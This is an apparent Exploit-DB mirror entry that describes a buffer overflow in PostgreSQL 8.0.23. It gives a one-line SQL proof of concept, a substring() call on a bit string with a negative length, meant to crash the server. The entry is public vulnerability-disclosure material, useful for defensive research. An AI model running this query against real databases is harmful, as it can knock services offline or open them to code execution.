exploit-db-mirror/exploits/linux/dos/33571.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
477 B
Text

source: https://www.securityfocus.com/bid/37973/info
PostgreSQL is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.
PostgreSQL 8.0.23 is vulnerable; other versions may also be affected.
testdb=# select substring(B'101010101010101010101010101010101010
10101010101',33,-15);